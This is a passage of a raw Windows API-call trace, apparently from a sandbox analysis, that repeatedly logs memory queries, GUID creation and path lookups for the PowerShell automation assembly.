State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.337] VirtualQuery (in: lpAddress=0x25cfa8, lpBuffer=0x25dfa8, dwLength=0x1c | out: lpBuffer=0x25dfa8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.337] VirtualQuery (in: lpAddress=0x25cfe4, lpBuffer=0x25dfe4, dwLength=0x1c | out: lpBuffer=0x25dfe4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.337] VirtualQuery (in: lpAddress=0x25cfa8, lpBuffer=0x25dfa8, dwLength=0x1c | out: lpBuffer=0x25dfa8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.338] VirtualQuery (in: lpAddress=0x25cfe4, lpBuffer=0x25dfe4, dwLength=0x1c | out: lpBuffer=0x25dfe4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.338] VirtualQuery (in: lpAddress=0x25ce4c, lpBuffer=0x25de4c, dwLength=0x1c | out: lpBuffer=0x25de4c*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.338] VirtualQuery (in: lpAddress=0x25cfa8, lpBuffer=0x25dfa8, dwLength=0x1c | out: lpBuffer=0x25dfa8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.338] VirtualQuery (in: lpAddress=0x25cfe4, lpBuffer=0x25dfe4, dwLength=0x1c | out: lpBuffer=0x25dfe4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.338] VirtualQuery (in: lpAddress=0x25cfa8, lpBuffer=0x25dfa8, dwLength=0x1c | out: lpBuffer=0x25dfa8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.339] VirtualQuery (in: lpAddress=0x25cfe4, lpBuffer=0x25dfe4, dwLength=0x1c | out: lpBuffer=0x25dfe4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.339] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xa4fc420c, Data2=0xab9b, Data3=0x4fbc, Data4=([0]=0xbb, [1]=0xd, [2]=0x6f, [3]=0xee, [4]=0x2c, [5]=0x5e, [6]=0x20, [7]=0xdf))) returned 0x0 [0141.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.339] GetLastError () returned 0x0 [0141.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.339] GetLastError () returned 0x0 [0141.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.339] GetLastError () returned 0x0 [0141.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.339] GetLastError () returned 0x0 [0141.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.339] GetLastError () returned 0x0 [0141.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.339] GetLastError () returned 0x0 [0141.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.339] GetLastError () returned 0x0 [0141.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.340] GetLastError () returned 0x0 [0141.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.340] GetLastError () returned 0x0 [0141.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.340] GetLastError () returned 0x0 [0141.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.340] GetLastError () returned 0x0 [0141.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.340] GetLastError () returned 0x0 [0141.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.340] GetLastError () returned 0x0 [0141.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.340] GetLastError () returned 0x0 [0141.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.340] GetLastError () returned 0x0 [0141.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.340] GetLastError () returned 0x0 [0141.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.340] GetLastError () returned 0x0 [0141.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.340] GetLastError () returned 0x0 [0141.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.341] GetLastError () returned 0x0 [0141.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.341] GetLastError () returned 0x0 [0141.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.341] GetLastError () returned 0x0 [0141.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.341] GetLastError () returned 0x0 [0141.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.341] GetLastError () returned 0x0 [0141.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.341] GetLastError () returned 0x0 [0141.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.341] GetLastError () returned 0x0 [0141.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.341] GetLastError () returned 0x0 [0141.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.341] GetLastError () returned 0x0 [0141.341] VirtualQuery (in: lpAddress=0x25cca4, lpBuffer=0x25dca4, dwLength=0x1c | out: lpBuffer=0x25dca4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.342] VirtualQuery (in: lpAddress=0x25cce0, lpBuffer=0x25dce0, dwLength=0x1c | out: lpBuffer=0x25dce0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da94, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.342] GetLastError () returned 0x0 [0141.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.342] GetLastError () returned 0x0 [0141.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.342] GetLastError () returned 0x0 [0141.342] VirtualQuery (in: lpAddress=0x25cdac, lpBuffer=0x25ddac, dwLength=0x1c | out: lpBuffer=0x25ddac*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da94, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.343] GetLastError () returned 0x0 [0141.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.343] GetLastError () returned 0x0 [0141.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.343] GetLastError () returned 0x0 [0141.343] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xa6ba6575, Data2=0x2e43, Data3=0x4b42, Data4=([0]=0x91, [1]=0x18, [2]=0x22, [3]=0x2c, [4]=0x55, [5]=0x6a, [6]=0xd9, [7]=0xe2))) returned 0x0 [0141.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.343] GetLastError () returned 0x0 [0141.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.343] GetLastError () returned 0x0 [0141.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.343] GetLastError () returned 0x0 [0141.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.343] GetLastError () returned 0x0 [0141.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.343] GetLastError () returned 0x0 [0141.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.343] GetLastError () returned 0x0 [0141.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.344] GetLastError () returned 0x0 [0141.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.344] GetLastError () returned 0x0 [0141.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.344] GetLastError () returned 0x0 [0141.344] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x293526cf, Data2=0x7031, Data3=0x4d80, Data4=([0]=0x95, [1]=0x96, [2]=0x4d, [3]=0x7d, [4]=0x5b, [5]=0x48, [6]=0x6c, [7]=0x53))) returned 0x0 [0141.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.344] GetLastError () returned 0x0 [0141.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.344] GetLastError () returned 0x0 [0141.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.344] GetLastError () returned 0x0 [0141.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.344] GetLastError () returned 0x0 [0141.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.344] GetLastError () returned 0x0 [0141.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.344] GetLastError () returned 0x0 [0141.345] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x46e739a7, Data2=0xd394, Data3=0x41da, Data4=([0]=0xa4, [1]=0xa9, [2]=0xc1, [3]=0x82, [4]=0xb5, [5]=0xb8, [6]=0x45, [7]=0x5b))) returned 0x0 [0141.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.345] GetLastError () returned 0x0 [0141.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.345] GetLastError () returned 0x0 [0141.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.345] GetLastError () returned 0x0 [0141.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.345] GetLastError () returned 0x0 [0141.345] GetFullPathNameW (in: 